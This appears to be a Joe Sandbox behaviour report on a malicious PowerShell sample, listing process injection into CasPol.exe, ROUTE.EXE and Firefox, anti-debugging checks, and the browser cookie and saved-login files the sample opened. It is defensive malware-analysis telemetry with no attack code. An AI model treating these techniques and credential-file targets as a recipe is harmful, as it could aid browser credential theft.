Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 2950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 4F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 5F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 60C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 70C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3310	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Window / User API: threadDelayed 3570	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Window / User API: threadDelayed 6404	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\ROUTE.EXE	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4816	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 4048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 6760	Thread sleep count: 3570 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 6760	Thread sleep time: -7140000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 6760	Thread sleep count: 6404 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 6760	Thread sleep time: -12808000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe TID: 7004	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe TID: 7004	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe TID: 7004	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe TID: 7004	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe TID: 7004	Thread sleep time: -41000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\ROUTE.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ROUTE.EXE	Last function: Thread delayed

Source: ROUTE.EXE, 0000000A.00000002.4263831483.000000000283E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4264559173.0000000001549000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2388912169.000001C21A21C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1192008	Jump to behavior

Source: SrZjbK9j4QXGHBZ.exe, 00000009.00000000.2008898662.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 00000009.00000002.4264662733.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4264827558.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: SrZjbK9j4QXGHBZ.exe, 00000009.00000000.2008898662.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 00000009.00000002.4264662733.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4264827558.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: SrZjbK9j4QXGHBZ.exe, 00000009.00000000.2008898662.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 00000009.00000002.4264662733.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4264827558.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: SrZjbK9j4QXGHBZ.exe, 00000009.00000000.2008898662.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 00000009.00000002.4264662733.0000000001800000.00000002.00000001.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4264827558.00000000019B0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\ebu.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ebu.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
ebu.ps1

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
